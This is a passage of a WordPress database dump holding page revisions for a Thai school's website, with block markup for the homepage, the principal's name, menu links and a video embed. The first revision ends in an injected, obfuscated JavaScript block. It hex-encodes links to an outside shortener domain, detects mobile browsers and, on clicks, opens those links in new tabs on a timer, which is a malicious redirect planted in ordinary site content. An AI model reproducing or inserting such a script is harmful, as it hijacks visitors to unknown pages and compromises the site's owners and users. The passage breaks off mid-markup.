/wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-11-13 11:56:31','2025-11-13 04:56:31','',19,'http://watprato.ssk.in.th/?p=759',0,'revision','',0),
(760,1,'2025-11-13 11:59:56','2025-11-13 04:59:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-\"><img class=\"gb-image gb-image-undefined\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"style\":{\"typography\":{\"fontSize\":\"25px\"}}} -->\n<p class=\"has-text-align-center\" style=\"font-size:25px\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div 